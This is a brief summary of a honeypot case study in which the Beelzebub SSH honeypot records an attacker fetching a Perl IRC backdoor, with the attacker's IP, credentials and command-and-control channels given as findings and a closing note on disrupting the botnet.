A real threat actor was captured using an SSH LLM honeypot called Beelzebub, which operates with a simple configuration file. The attacker, unaware of the honeypot's purpose, downloaded various binaries that contained known exploits. Notably, they attempted to execute a Perl script designed to connect to a botnet. The honeypot gathered valuable data, including the attacker's IP address (45.175.100.69) and login credentials (admin/123456). During the interaction, the threat actor executed commands that revealed their intentions. They downloaded a Perl script named "sshd" from a compromised Joomla site, which served as a backdoor for executing commands and launching denial-of-service attacks. The script included configurations for connecting to an IRC channel for command and control. The analysis showed multiple attempts to run the backdoor, indicating the attacker's persistence. The author accessed the IRC channels used by the threat actor for further investigation. They identified two channels, #rootbox and #c0d3rs-TeaM, which hosted the threat actor's communications. The article concludes with a note on how to disrupt such botnets by closing these channels, emphasizing the importance of monitoring and mitigating threats in real time.